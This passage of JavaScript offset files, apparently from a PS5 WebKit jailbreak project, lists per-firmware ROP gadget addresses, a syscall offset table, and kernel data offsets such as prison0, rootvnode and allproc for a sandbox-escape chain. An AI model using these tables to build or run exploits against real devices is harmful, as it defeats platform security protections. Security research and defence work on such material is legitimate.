13 | const OFFSET_lc_longjmp = 0x0005EA00;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00043B7C,
20 | "pop rsi": 0x0008F33E,
21 | "pop rdx": 0x001A78B2,
22 | "pop rcx": 0x000156EA,
23 | "pop r8" : 0x004CAC02,
24 | "pop r9" : 0x004E44AC,
25 | "pop rax": 0x000A2654,
26 | "pop rsp": 0x0005D293,
27 |
28 | "mov [rdi], rsi": 0x00118510,
29 | "mov [rdi], rax": 0x0012547A,
30 | "mov [rdi], eax": 0x00019513,
31 |
32 | "infloop": 0x00013B01,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x002040C2,
36 | "sete al" : 0x00029471,
37 | "seta al" : 0x000CCFB4,
38 | "setb al" : 0x001B75F7,
39 | "setg al" : 0x000708C9,
40 | "setl al" : 0x001F9FAC,
41 | "shl rax, 3" : 0x01A43EA3,
42 | "add rax, rdx" : 0x016F48E8,
43 | "mov rax, [rax]" : 0x00010B4C,
44 | "inc dword [rax]": 0x0176294F,
45 | };
46 |
47 | //check
48 | let syscall_map = {
49 | 0x001: 0x34230, // sys_exit
50 | 0x002: 0x351E0, // sys_fork
51 | 0x003: 0x33400, // sys_read
52 | 0x004: 0x33360, // sys_write
53 | 0x005: 0x33A00, // sys_open
54 | 0x006: 0x34030, // sys_close
55 | 0x007: 0x32C20, // sys_wait4
56 | 0x00A: 0x34D20, // sys_unlink
57 | 0x00C: 0x346B0, // sys_chdir
58 | 0x00F: 0x340B0, // sys_chmod
59 | 0x014: 0x33580, // sys_getpid
60 | 0x017: 0x33080, // sys_setuid
61 | 0x018: 0x34690, // sys_getuid
62 | 0x019: 0x33A40, // sys_geteuid
63 | 0x01B: 0x33AE0, // sys_recvmsg
64 | 0x01C: 0x33D10, // sys_sendmsg
65 | 0x01D: 0x34860, // sys_recvfrom
66 | 0x01E: 0x32F80, // sys_accept
67 | 0x01F: 0x32DA0, // sys_getpeername
68 | 0x020: 0x34EC0, // sys_getsockname
69 | 0x021: 0x349E0, // sys_access
70 | 0x022: 0x34B60, // sys_chflags
71 | 0x023: 0x34530, // sys_fchflags
72 | 0x024: 0x35410, // sys_sync
73 | 0x025: 0x339E0, // sys_kill
74 | 0x027: 0x33480, // sys_getppid
75 | 0x029: 0x34A40, // sys_dup
76 | 0x02A: 0x333D0, // sys_pipe
77 | 0x02B: 0x35080, // sys_getegid
78 | 0x02C: 0x353D0, // sys_profil
79 | 0x02F: 0x32F20, // sys_getgid
80 | 0x031: 0x32F00, // sys_getlogin
81 | 0x032: 0x34790, // sys_setlogin
82 | 0x035: 0x33140, // sys_sigaltstack
83 | 0x036: 0x332A0, // sys_ioctl
84 | 0x037: 0x34570, // sys_reboot
85 | 0x038: 0x34470, // sys_revoke
86 | 0x03B: 0x34770, // sys_execve
87 | 0x041: 0x34110, // sys_msync
88 | 0x049: 0x33900, // sys_munmap
89 | 0x04A: 0x34670, // sys_mprotect
90 | 0x04B: 0x337F0, // sys_madvise
91 | 0x04E: 0x339C0, // sys_mincore
92 | 0x04F: 0x32E80, // sys_getgroups
93 | 0x050: 0x33420, // sys_setgroups
94 | 0x053: 0x32E60, // sys_setitimer
95 | 0x056: 0x32C80, // sys_getitimer
96 | 0x059: 0x344D0, // sys_getdtablesize
97 | 0x05A: 0x348E0, // sys_dup2
98 | 0x05C: 0x33F10, // sys_fcntl
99 | 0x05D: 0x33A60, // sys_select
100 | 0x05F: 0x32EC0, // sys_fsync
101 | 0x060: 0x33DF0, // sys_setpriority
102 | 0x061: 0x33640, // sys_socket
103 | 0x062: 0x346D0, // sys_connect
104 | 0x063: 0x35040, // sys_netcontrol
105 | 0x064: 0x32C40, // sys_getpriority
106 | 0x065: 0x34C60, // sys_netabort
107 | 0x066: 0x34FE0, // sys_netgetsockinfo
108 | 0x068: 0x34CE0, // sys_bind
109 | 0x069: 0x33F50, // sys_setsockopt
110 | 0x06A: 0x33240, // sys_listen
111 | 0x071: 0x34250, // sys_socketex
112 | 0x072: 0x33C20, // sys_socketclose
113 | 0x074: 0x353F0, // sys_gettimeofday
114 | 0x075: 0x354D0, // sys_getrusage
115 | 0x076: 0x32C00, // sys_getsockopt
116 | 0x078: 0x33E90, // sys_readv
117 | 0x079: 0x33CF0, // sys_writev
118 | 0x07A: 0x34940, // sys_settimeofday
119 | 0x07C: 0x33880, // sys_fchmod
120 | 0x07D: 0x340F0, // sys_netgetiflist
121 | 0x07E: 0x34FC0, // sys_setreuid
122 | 0x07F: 0x33BE0, // sys_setregid
123 | 0x080: 0x34B40, // sys_rename
124 | 0x083: 0x33B60, // sys_flock
125 | 0x085: 0x35430, // sys_sendto
126 | 0x086: 0x35260, // sys_shutdown
127 | 0x087: 0x345F0, // sys_socketpair
128 | 0x088: 0x34390, // sys_mkdir
129 | 0x089: 0x335E0, // sys_rmdir
130 | 0x08A: 0x32AF0, // sys_utimes
131 | 0x08C: 0x34F80, // sys_adjtime
132 | 0x08D: 0x340D0, // sys_kqueueex
133 | 0x093: 0x34330, // sys_setsid
134 | 0x0A5: 0x32E20, // sys_sysarch
135 | 0x0B6: 0x34DC0, // sys_setegid
136 | 0x0B7: 0x32C60, // sys_seteuid
137 | 0x0BC: 0x34E20, // sys_stat
138 | 0x0BD: 0x35220, // sys_fstat
139 | 0x0BE: 0x33C00, // sys_lstat
140 | 0x0BF: 0x33300, // sys_pathconf
141 | 0x0C0: 0x345B0, // sys_fpathconf
142 | 0x0C2: 0x33B40, // sys_getrlimit
143 | 0x0C3: 0x33720, // sys_setrlimit
144 | 0x0C4: 0x34D40, // sys_getdirentries
145 | 0x0CA: 0x34B20, // sys___sysctl
146 | 0x0CB: 0x341D0, // sys_mlock
147 | 0x0CC: 0x34BC0, // sys_munlock
148 | 0x0CE: 0x33680, // sys_futimes
149 | 0x0D1: 0x33C60, // sys_poll
150 | 0x0E8: 0x32D20, // sys_clock_gettime
151 | 0x0E9: 0x34190, // sys_clock_settime
152 | 0x0EA: 0x35190, // sys_clock_getres
153 | 0x0EB: 0x34D60, // sys_ktimer_create
154 | 0x0EC: 0x334E0, // sys_ktimer_delete
155 | 0x0ED: 0x35240, // sys_ktimer_settime
156 | 0x0EE: 0x346F0, // sys_ktimer_gettime
157 | 0x0EF: 0x338A0, // sys_ktimer_getoverrun
158 | 0x0F0: 0x34C20, // sys_nanosleep
159 | 0x0F1: 0x34450, // sys_ffclock_getcounter
160 | 0x0F2: 0x33440, // sys_ffclock_setestimate
161 | 0x0F3: 0x342D0, // sys_ffclock_getestimate
162 | 0x0F7: 0x34CC0, // sys_clock_getcpuclockid2
163 | 0x0FD: 0x34880, // sys_issetugid
164 | 0x110: 0x35020, // sys_getdents
165 | 0x121: 0x34730, // sys_preadv
166 | 0x122: 0x33C80, // sys_pwritev
167 | 0x136: 0x33980, // sys_getsid
168 | 0x13B: 0x34E40, // sys_aio_suspend
169 | 0x144: 0x33500, // sys_mlockall
170 | 0x145: 0x34900, // sys_munlockall
171 | 0x147: 0x33600, // sys_sched_setparam
172 | 0x148: 0x34270, // sys_sched_getparam
173 | 0x149: 0x32DC0, // sys_sched_setscheduler
174 | 0x14A: 0x33C40, // sys_sched_getscheduler
175 | 0x14B: 0x33AA0, // sys_sched_yield
176 | 0x14C: 0x33040, // sys_sched_get_priority_max
177 | 0x14D: 0x33160, // sys_sched_get_priority_min
178 | 0x14E: 0x33390, // sys_sched_rr_get_interval
179 | 0x154: 0x32B50, // sys_sigprocmask
180 | 0x155: 0x32B90, // sys_sigsuspend
181 | 0x157: 0x34A60, // sys_sigpending
182 | 0x159: 0x34B80, // sys_sigtimedwait
183 | 0x15A: 0x347C0, // sys_sigwaitinfo
184 | 0x16A: 0x34DA0, // sys_kqueue
185 | 0x16B: 0x33000, // sys_kevent
186 | 0x17B: 0x32FA0, // sys_mtypeprotect
187 | 0x188: 0x330C0, // sys_uuidgen
188 | 0x189: 0x35510, // sys_sendfile
189 | 0x18D: 0x33560, // sys_fstatfs
190 | 0x190: 0x33120, // sys_ksem_close
191 | 0x191: 0x33EB0, // sys_ksem_post
192 | 0x192: 0x34750, // sys_ksem_wait
193 | 0x193: 0x354F0, // sys_ksem_trywait
194 | 0x194: 0x33260, // sys_ksem_init
195 | 0x195: 0x34C80, // sys_ksem_open
196 | 0x196: 0x34960, // sys_ksem_unlink
197 | 0x197: 0x330E0, // sys_ksem_getvalue
198 | 0x198: 0x34920, // sys_ksem_destroy
199 | 0x1A0: 0x34E00, // sys_sigaction
200 | 0x1A1: 0x34AA0, // sys_sigreturn
201 | 0x1A5: 0x33780, // sys_getcontext
202 | 0x1A6: 0x344B0, // sys_setcontext
203 | 0x1A7: 0x345D0, // sys_swapcontext
204 | 0x1AD: 0x337D0, // sys_sigwait
205 | 0x1AE: 0x32EA0, // sys_thr_create
206 | 0x1AF: 0x33200, // sys_thr_exit
207 | 0x1B0: 0x33BA0, // sys_thr_self
208 | 0x1B1: 0x33220, // sys_thr_kill
209 | 0x1B9: 0x34840, // sys_ksem_timedwait
210 | 0x1BA: 0x32B70, // sys_thr_suspend
211 | 0x1BB: 0x334A0, // sys_thr_wake
212 | 0x1BC: 0x34510, // sys_kldunloadf
213 | 0x1C6: 0x35200, // sys__umtx_op
214 | 0x1C7: 0x34F40, // sys_thr_new
215 | 0x1C8: 0x34EA0, // sys_sigqueue
216 | 0x1D0: 0x34800, // sys_thr_set_name
217 | 0x1D2: 0x33DB0, // sys_rtprio_thread
218 | 0x1DB: 0x33540, // sys_pread
219 | 0x1DC: 0x34650, // sys_pwrite
220 | 0x1DD: 0x34F20, // sys_mmap
221 | 0x1DE: 0x34A20, // sys_lseek
222 | 0x1DF: 0x33AC0, // sys_truncate
223 | 0x1E0: 0x33520, // sys_ftruncate
224 | 0x1E1: 0x32B10, // sys_thr_kill2
225 | 0x1E2: 0x35490, // sys_shm_open
226 | 0x1E3: 0x34F00, // sys_shm_unlink
227 | 0x1E6: 0x33740, // sys_cpuset_getid
228 | 0x1E7: 0x35300, // sys_cpuset_getaffinity
229 | 0x1E8: 0x34AC0, // sys_cpuset_setaffinity
230 | 0x1F3: 0x32EE0, // sys_openat
231 | 0x203: 0x34590, // sys___cap_rights_get
232 | 0x20A: 0x33FD0, // sys_pselect
233 | 0x214: 0x34090, // sys_regmgr_call
234 | 0x215: 0x33E10, // sys_jitshm_create
235 | 0x216: 0x343F0, // sys_jitshm_alias
236 | 0x217: 0x332E0, // sys_dl_get_list
237 | 0x218: 0x34130, // sys_dl_get_info
238 | 0x21A: 0x34070, // sys_evf_create
239 | 0x21B: 0x334C0, // sys_evf_delete
240 | 0x21C: 0x34410, // sys_evf_open
241 | 0x21D: 0x33FF0, // sys_evf_close
242 | 0x21E: 0x342B0, // sys_evf_wait
243 | 0x21F: 0x34A80, // sys_evf_trywait
244 | 0x220: 0x34430, // sys_evf_set
245 | 0x221: 0x349A0, // sys_evf_clear
246 | 0x222: 0x337B0, // sys_evf_cancel
247 | 0x223: 0x34290, // sys_query_memory_protection
248 | 0x224: 0x33B80, // sys_batch_map
249 | 0x225: 0x33D90, // sys_osem_create
250 | 0x226: 0x32D60, // sys_osem_delete
251 | 0x227: 0x32CE0, // sys_osem_open
252 | 0x228: 0x352E0, // sys_osem_close
253 | 0x229: 0x34370, // sys_osem_wait
254 | 0x22A: 0x34980, // sys_osem_trywait
255 | 0x22B: 0x34610, // sys_osem_post
256 | 0x22C: 0x33EF0, // sys_osem_cancel
257 | 0x22D: 0x33CA0, // sys_namedobj_create
258 | 0x22E: 0x339A0, // sys_namedobj_delete
259 | 0x22F: 0x35570, // sys_set_vm_container
260 | 0x230: 0x33460, // sys_debug_init
261 | 0x233: 0x33DD0, // sys_opmc_enable
262 | 0x234: 0x32E40, // sys_opmc_disable
263 | 0x235: 0x33E50, // sys_opmc_set_ctl
264 | 0x236: 0x33E70, // sys_opmc_set_ctr
265 | 0x237: 0x348C0, // sys_opmc_get_ctr
266 | 0x23C: 0x336E0, // sys_virtual_query
267 | 0x249: 0x34D00, // sys_is_in_sandbox
268 | 0x24A: 0x338C0, // sys_dmem_container
269 | 0x24B: 0x34170, // sys_get_authinfo
270 | 0x24C: 0x32CC0, // sys_mname
271 | 0x24F: 0x332C0, // sys_dynlib_dlsym
272 | 0x250: 0x335C0, // sys_dynlib_get_list
273 | 0x251: 0x35060, // sys_dynlib_get_info
274 | 0x252: 0x33F70, // sys_dynlib_load_prx
275 | 0x253: 0x32F60, // sys_dynlib_unload_prx
276 | 0x254: 0x34DE0, // sys_dynlib_do_copy_relocations
277 | 0x256: 0x33D70, // sys_dynlib_get_proc_param
278 | 0x257: 0x350C0, // sys_dynlib_process_needed_and_relocate
279 | 0x258: 0x32B30, // sys_sandbox_path
280 | 0x259: 0x336A0, // sys_mdbg_service
281 | 0x25A: 0x33D30, // sys_randomized_path
282 | 0x25B: 0x34BA0, // sys_rdup
283 | 0x25C: 0x331A0, // sys_dl_get_metadata
284 | 0x25D: 0x338E0, // sys_workaround8849
285 | 0x25E: 0x330A0, // sys_is_development_mode
286 | 0x25F: 0x34210, // sys_get_self_auth_info
287 | 0x260: 0x354B0, // sys_dynlib_get_info_ex
288 | 0x262: 0x35550, // sys_budget_get_ptype
289 | 0x263: 0x333B0, // sys_get_paging_stats_of_all_threads
290 | 0x264: 0x352C0, // sys_get_proc_type_info
291 | 0x265: 0x32AD0, // sys_get_resident_count
292 | 0x267: 0x33E30, // sys_get_resident_fmem_count
293 | 0x268: 0x34EE0, // sys_thr_get_name
294 | 0x269: 0x344F0, // sys_set_gpo
295 | 0x26A: 0x341F0, // sys_get_paging_stats_of_all_objects
296 | 0x26B: 0x32FE0, // sys_test_debug_rwmem
297 | 0x26C: 0x33100, // sys_free_stack
298 | 0x26E: 0x32D00, // sys_ipmimgr_call
299 | 0x26F: 0x34150, // sys_get_gpo
300 | 0x270: 0x35530, // sys_get_vm_map_timestamp
301 | 0x271: 0x34AE0, // sys_opmc_set_hw
302 | 0x272: 0x33620, // sys_opmc_get_hw
303 | 0x273: 0x32CA0, // sys_get_cpu_usage_all
304 | 0x274: 0x34310, // sys_mmap_dmem
305 | 0x275: 0x336C0, // sys_physhm_open
306 | 0x276: 0x33ED0, // sys_physhm_unlink
307 | 0x278: 0x35470, // sys_thr_suspend_ucontext
308 | 0x279: 0x33960, // sys_thr_resume_ucontext
309 | 0x27A: 0x33920, // sys_thr_get_ucontext
310 | 0x27B: 0x33A20, // sys_thr_set_ucontext
311 | 0x27C: 0x33660, // sys_set_timezone_info
312 | 0x27D: 0x343B0, // sys_set_phys_fmem_limit
313 | 0x27E: 0x33760, // sys_utc_to_localtime
314 | 0x27F: 0x35590, // sys_localtime_to_utc
315 | 0x280: 0x34710, // sys_set_uevt
316 | 0x281: 0x33280, // sys_get_cpu_usage_proc
317 | 0x282: 0x33B00, // sys_get_map_statistics
318 | 0x283: 0x348A0, // sys_set_chicken_switches
319 | 0x286: 0x351C0, // sys_get_kernel_mem_statistics
320 | 0x287: 0x343D0, // sys_get_sdk_compiled_version
321 | 0x288: 0x32D40, // sys_app_state_change
322 | 0x289: 0x34F60, // sys_dynlib_get_obj_member
323 | 0x28C: 0x32DE0, // sys_process_terminate
324 | 0x28D: 0x335A0, // sys_blockpool_open
325 | 0x28E: 0x33340, // sys_blockpool_map
326 | 0x28F: 0x34D80, // sys_blockpool_unmap
327 | 0x290: 0x349C0, // sys_dynlib_get_info_for_libdbg
328 | 0x291: 0x33A80, // sys_blockpool_batch
329 | 0x292: 0x331E0, // sys_fdatasync
330 | 0x293: 0x33700, // sys_dynlib_get_list2
331 | 0x294: 0x35450, // sys_dynlib_get_info2
332 | 0x295: 0x34C00, // sys_aio_submit
333 | 0x296: 0x33180, // sys_aio_multi_delete
334 | 0x297: 0x33FB0, // sys_aio_multi_wait
335 | 0x298: 0x33060, // sys_aio_multi_poll
336 | 0x299: 0x34B00, // sys_aio_get_data
337 | 0x29A: 0x33F90, // sys_aio_multi_cancel
338 | 0x29B: 0x32F40, // sys_get_bio_usage_all
339 | 0x29C: 0x34630, // sys_aio_create
340 | 0x29D: 0x350A0, // sys_aio_submit_cmd
341 | 0x29E: 0x34FA0, // sys_aio_init
342 | 0x29F: 0x34A00, // sys_get_page_table_stats
343 | 0x2A0: 0x34E60, // sys_dynlib_get_list_for_libdbg
344 | 0x2A1: 0x35000, // sys_blockpool_move
345 | 0x2A2: 0x34E80, // sys_virtual_query_all
346 | 0x2A3: 0x33F30, // sys_reserve_2mb_page
347 | 0x2A4: 0x347E0, // sys_cpumode_yield
348 | 0x2A5: 0x342F0, // sys_wait6
349 | 0x2A6: 0x33D50, // sys_cap_rights_limit
350 | 0x2A7: 0x33320, // sys_cap_ioctls_limit
351 | 0x2A8: 0x34050, // sys_cap_ioctls_get
352 | 0x2A9: 0x34820, // sys_cap_fcntls_limit
353 | 0x2AA: 0x32FC0, // sys_cap_fcntls_get
354 | 0x2AB: 0x35320, // sys_bindat
355 | 0x2AC: 0x33B20, // sys_connectat
356 | 0x2AD: 0x32D80, // sys_chflagsat
357 | 0x2AE: 0x32BD0, // sys_accept4
358 | 0x2AF: 0x331C0, // sys_pipe2
359 | 0x2B0: 0x33BC0, // sys_aio_mlock
360 | 0x2B1: 0x352A0, // sys_procctl
361 | 0x2B2: 0x34550, // sys_ppoll
362 | 0x2B3: 0x34490, // sys_futimens
363 | 0x2B4: 0x34C40, // sys_utimensat
364 | 0x2B5: 0x341B0, // sys_numa_getaffinity
365 | 0x2B6: 0x34010, // sys_numa_setaffinity
366 | 0x2C1: 0x33020, // sys_get_phys_page_size
367 | 0x2C9: 0x35280, // sys_get_ppr_sdk_compiled_version
368 | 0x2CC: 0x33860, // sys_openintr
369 | 0x2CD: 0x34350, // sys_dl_get_info_2
370 | 0x2CE: 0x33940, // sys_acinfo_add
371 | 0x2CF: 0x32BB0, // sys_acinfo_delete
372 | 0x2D0: 0x34BE0, // sys_acinfo_get_all_for_coredump
373 | 0x2D1: 0x34CA0, // sys_ampr_ctrl_debug
374 | 0x2D2: 0x32E00, // sys_workspace_ctrl
375 | };
376 |
377 | const OFFSET_KERNEL_DATA_KQUEUE_LOW_WORD = 0x8C1E;
378 | const OFFSET_KERNEL_DATA_KQUEUE_BASE_SLIDE = 0x318C1E;
379 | const OFFSET_KERNEL_TEXT_KQUEUE_BASE_SLIDE = 0xEE8C1E;
380 | const OFFSET_KERNEL_DATA_BASE_ALLPROC = 0x27EDCB8;
381 | const OFFSET_KERNEL_DATA_BASE_SECURITYFLAGS = 0x6506474;
382 | const OFFSET_KERNEL_DATA_BASE_TARGETID = 0x650647D;
383 | const OFFSET_KERNEL_DATA_BASE_QA_FLAGS = 0x6506498;
384 | const OFFSET_KERNEL_DATA_BASE_UTOKEN_FLAGS = 0x6506500;
385 | const OFFSET_KERNEL_DATA_BASE_PRISON0 = 0x1D34D00;
386 | const OFFSET_KERNEL_DATA_BASE_ROOTVNODE = 0x66E74C0;
387 |
--------------------------------------------------------------------------------
/document/en/ps5/offsets/4.02.js:
--------------------------------------------------------------------------------
1 | const OFFSET_wk_vtable_first_element = 0x00D04580;
2 | const OFFSET_wk_memset_import = 0x028F9D38;
3 | const OFFSET_wk___stack_chk_guard_import = 0x028F9A18;
4 |
5 | const OFFSET_lk___stack_chk_guard = 0x00069190;
6 | const OFFSET_lk_pthread_create_name_np = 0x00001B60;
7 | const OFFSET_lk_pthread_join = 0x0002FAD0;
8 | const OFFSET_lk_pthread_exit = 0x00020A80;
9 | const OFFSET_lk__thread_list = 0x000601A8;
10 |
11 | const OFFSET_lc_memset = 0x000148F0;
12 | const OFFSET_lc_setjmp = 0x0005E9B0;
13 | const OFFSET_lc_longjmp = 0x0005EA00;
14 |
15 | const OFFSET_WORKER_STACK_OFFSET = 0x0007FB88;
16 |
17 | let wk_gadgetmap = {
18 | "ret" : 0x00000042,
19 | "pop rdi": 0x00043B7C,
20 | "pop rsi": 0x0008F33E,
21 | "pop rdx": 0x000156EA,
22 | "pop rcx": 0x00060DF3,
23 | "pop r8": 0x01262A4F,
24 | "pop r9" : 0x004E450C,
25 | "pop rax": 0x00084094,
26 | "pop rsp": 0x0005D293,
27 |
28 | "mov [rdi], rsi": 0x00118570,
29 | "mov [rdi], rax": 0x00C3A5C0,
30 | "mov [rdi], eax": 0x003FB6E6,
31 |
32 | "infloop": 0x000109E1,
33 |
34 | //branching specific gadgets
35 | "cmp [rcx], eax" : 0x00204122,
36 | "sete al" : 0x00B7B735,
37 | "seta al" : 0x000CCFB4,
38 | "setb al" : 0x001B7657,
39 | "setg al" : 0x000708c9,
40 | "setl al" : 0x01517692,
41 | "shl rax, 3" : 0x01A43F03,
42 | "add rax, rdx" : 0x016F4948,
43 | "mov rax, [rax]" : 0x0142E309,
44 | "inc dword [rax]": 0x017629AF,
45 | };
46 |
47 | let syscall_map = {
48 | 0x001: 0x34230, // sys_exit
49 | 0x002: 0x351E0, // sys_fork
50 | 0x003: 0x33400, // sys_read
51 | 0x004: 0x33360, // sys_write
52 | 0x005: 0x33A00, // sys_open
53 | 0x006: 0x34030, // sys_close
54 | 0x007: 0x32C20, // sys_wait4
55 | 0x00A: 0x34D20, // sys_unlink
56 | 0x00C: 0x346B0, // sys_chdir
57 | 0x00F: 0x340B0, // sys_chmod
58 | 0x014: 0x33580, // sys_getpid
59 | 0x017: 0x33080, // sys_setuid
60 | 0x018: 0x34690, // sys_getuid
61 | 0x019: 0x33A40, // sys_geteuid
62 | 0x01B: 0x33AE0, // sys_recvmsg
63 | 0x01C: 0x33D10, // sys_sendmsg
64 | 0x01D: 0x34860, // sys_recvfrom
65 | 0x01E: 0x32F80, // sys_accept
66 | 0x01F: 0x32DA0, // sys_getpeername
67 | 0x020: 0x34EC0, // sys_getsockname
68 | 0x021: 0x349E0, // sys_access
69 | 0x022: 0x34B60, // sys_chflags
70 | 0x023: 0x34530, // sys_fchflags
71 | 0x024: 0x35410, // sys_sync
72 | 0x025: 0x339E0, // sys_kill
73 | 0x027: 0x33480, // sys_getppid
74 | 0x029: 0x34A40, // sys_dup
75 | 0x02A: 0x333D0, // sys_pipe
76 | 0x02B: 0x35080, // sys_getegid
77 | 0x02C: 0x353D0, // sys_profil
78 | 0x02F: 0x32F20, // sys_getgid
79 | 0x031: 0x32F00, // sys_getlogin
80 | 0x032: 0x34790, // sys_setlogin
81 | 0x035: 0x33140, // sys_sigaltstack
82 | 0x036: 0x332A0, // sys_ioctl
83 | 0x037: 0x34570, // sys_reboot
84 | 0x038: 0x34470, // sys_revoke
85 | 0x03B: 0x34770, // sys_execve
86 | 0x041: 0x34110, // sys_msync
87 | 0x049: 0x33900, // sys_munmap
88 | 0x04A: 0x34670, // sys_mprotect
89 | 0x04B: 0x337F0, // sys_madvise
90 | 0x04E: 0x339C0, // sys_mincore
91 | 0x04F: 0x32E80, // sys_getgroups
92 | 0x050: 0x33420, // sys_setgroups
93 | 0x053: 0x32E60, // sys_setitimer
94 | 0x056: 0x32C80, // sys_getitimer
95 | 0x059: 0x344D0, // sys_getdtablesize
96 | 0x05A: 0x348E0, // sys_dup2
97 | 0x05C: 0x33F10, // sys_fcntl
98 | 0x05D: 0x33A60, // sys_select
99 | 0x05F: 0x32EC0, // sys_fsync
100 | 0x060: 0x33DF0, // sys_setpriority
101 | 0x061: 0x33640, // sys_socket
102 | 0x062: 0x346D0, // sys_connect
103 | 0x063: 0x35040, // sys_netcontrol
104 | 0x064: 0x32C40, // sys_getpriority
105 | 0x065: 0x34C60, // sys_netabort
106 | 0x066: 0x34FE0, // sys_netgetsockinfo
107 | 0x068: 0x34CE0, // sys_bind
108 | 0x069: 0x33F50, // sys_setsockopt
109 | 0x06A: 0x33240, // sys_listen
110 | 0x071: 0x34250, // sys_socketex
111 | 0x072: 0x33C20, // sys_socketclose
112 | 0x074: 0x353F0, // sys_gettimeofday
113 | 0x075: 0x354D0, // sys_getrusage
114 | 0x076: 0x32C00, // sys_getsockopt
115 | 0x078: 0x33E90, // sys_readv
116 | 0x079: 0x33CF0, // sys_writev
117 | 0x07A: 0x34940, // sys_settimeofday
118 | 0x07C: 0x33880, // sys_fchmod
119 | 0x07D: 0x340F0, // sys_netgetiflist
120 | 0x07E: 0x34FC0, // sys_setreuid
121 | 0x07F: 0x33BE0, // sys_setregid
122 | 0x080: 0x34B40, // sys_rename
123 | 0x083: 0x33B60, // sys_flock
124 | 0x085: 0x35430, // sys_sendto
125 | 0x086: 0x35260, // sys_shutdown
126 | 0x087: 0x345F0, // sys_socketpair
127 | 0x088: 0x34390, // sys_mkdir
128 | 0x089: 0x335E0, // sys_rmdir
129 | 0x08A: 0x32AF0, // sys_utimes
130 | 0x08C: 0x34F80, // sys_adjtime
131 | 0x08D: 0x340D0, // sys_kqueueex
132 | 0x093: 0x34330, // sys_setsid
133 | 0x0A5: 0x32E20, // sys_sysarch
134 | 0x0B6: 0x34DC0, // sys_setegid
135 | 0x0B7: 0x32C60, // sys_seteuid
136 | 0x0BC: 0x34E20, // sys_stat
137 | 0x0BD: 0x35220, // sys_fstat
138 | 0x0BE: 0x33C00, // sys_lstat
139 | 0x0BF: 0x33300, // sys_pathconf
140 | 0x0C0: 0x345B0, // sys_fpathconf
141 | 0x0C2: 0x33B40, // sys_getrlimit
142 | 0x0C3: 0x33720, // sys_setrlimit
143 | 0x0C4: 0x34D40, // sys_getdirentries
144 | 0x0CA: 0x34B20, // sys___sysctl
145 | 0x0CB: 0x341D0, // sys_mlock
146 | 0x0CC: 0x34BC0, // sys_munlock
147 | 0x0CE: 0x33680, // sys_futimes
148 | 0x0D1: 0x33C60, // sys_poll
149 | 0x0E8: 0x32D20, // sys_clock_gettime
150 | 0x0E9: 0x34190, // sys_clock_settime
151 | 0x0EA: 0x35190, // sys_clock_getres
152 | 0x0EB: 0x34D60, // sys_ktimer_create
153 | 0x0EC: 0x334E0, // sys_ktimer_delete
154 | 0x0ED: 0x35240, // sys_ktimer_settime
155 | 0x0EE: 0x346F0, // sys_ktimer_gettime
156 | 0x0EF: 0x338A0, // sys_ktimer_getoverrun
157 | 0x0F0: 0x34C20, // sys_nanosleep
158 | 0x0F1: 0x34450, // sys_ffclock_getcounter
159 | 0x0F2: 0x33440, // sys_ffclock_setestimate
160 | 0x0F3: 0x342D0, // sys_ffclock_getestimate
161 | 0x0F7: 0x34CC0, // sys_clock_getcpuclockid2
162 | 0x0FD: 0x34880, // sys_issetugid
163 | 0x110: 0x35020, // sys_getdents
164 | 0x121: 0x34730, // sys_preadv
165 | 0x122: 0x33C80, // sys_pwritev
166 | 0x136: 0x33980, // sys_getsid
167 | 0x13B: 0x34E40, // sys_aio_suspend
168 | 0x144: 0x33500, // sys_mlockall
169 | 0x145: 0x34900, // sys_munlockall
170 | 0x147: 0x33600, // sys_sched_setparam
171 | 0x148: 0x34270, // sys_sched_getparam
172 | 0x149: 0x32DC0, // sys_sched_setscheduler
173 | 0x14A: 0x33C40, // sys_sched_getscheduler
174 | 0x14B: 0x33AA0, // sys_sched_yield
175 | 0x14C: 0x33040, // sys_sched_get_priority_max
176 | 0x14D: 0x33160, // sys_sched_get_priority_min
177 | 0x14E: 0x33390, // sys_sched_rr_get_interval
178 | 0x154: 0x32B50, // sys_sigprocmask
179 | 0x155: 0x32B90, // sys_sigsuspend
180 | 0x157: 0x34A60, // sys_sigpending
181 | 0x159: 0x34B80, // sys_sigtimedwait
182 | 0x15A: 0x347C0, // sys_sigwaitinfo
183 | 0x16A: 0x34DA0, // sys_kqueue
184 | 0x16B: 0x33000, // sys_kevent
185 | 0x17B: 0x32FA0, // sys_mtypeprotect
186 | 0x188: 0x330C0, // sys_uuidgen
187 | 0x189: 0x35510, // sys_sendfile
188 | 0x18D: 0x33560, // sys_fstatfs
189 | 0x190: 0x33120, // sys_ksem_close
190 | 0x191: 0x33EB0, // sys_ksem_post
191 | 0x192: 0x34750, // sys_ksem_wait
192 | 0x193: 0x354F0, // sys_ksem_trywait
193 | 0x194: 0x33260, // sys_ksem_init
194 | 0x195: 0x34C80, // sys_ksem_open
195 | 0x196: 0x34960, // sys_ksem_unlink
196 | 0x197: 0x330E0, // sys_ksem_getvalue
197 | 0x198: 0x34920, // sys_ksem_destroy
198 | 0x1A0: 0x34E00, // sys_sigaction
199 | 0x1A1: 0x34AA0, // sys_sigreturn
200 | 0x1A5: 0x33780, // sys_getcontext
201 | 0x1A6: 0x344B0, // sys_setcontext
202 | 0x1A7: 0x345D0, // sys_swapcontext
203 | 0x1AD: 0x337D0, // sys_sigwait
204 | 0x1AE: 0x32EA0, // sys_thr_create
205 | 0x1AF: 0x33200, // sys_thr_exit
206 | 0x1B0: 0x33BA0, // sys_thr_self
207 | 0x1B1: 0x33220, // sys_thr_kill
208 | 0x1B9: 0x34840, // sys_ksem_timedwait
209 | 0x1BA: 0x32B70, // sys_thr_suspend
210 | 0x1BB: 0x334A0, // sys_thr_wake
211 | 0x1BC: 0x34510, // sys_kldunloadf
212 | 0x1C6: 0x35200, // sys__umtx_op
213 | 0x1C7: 0x34F40, // sys_thr_new
214 | 0x1C8: 0x34EA0, // sys_sigqueue
215 | 0x1D0: 0x34800, // sys_thr_set_name
216 | 0x1D2: 0x33DB0, // sys_rtprio_thread
217 | 0x1DB: 0x33540, // sys_pread
218 | 0x1DC: 0x34650, // sys_pwrite
219 | 0x1DD: 0x34F20, // sys_mmap
220 | 0x1DE: 0x34A20, // sys_lseek
221 | 0x1DF: 0x33AC0, // sys_truncate
222 | 0x1E0: 0x33520, // sys_ftruncate
223 | 0x1E1: 0x32B10, // sys_thr_kill2
224 | 0x1E2: 0x35490, // sys_shm_open
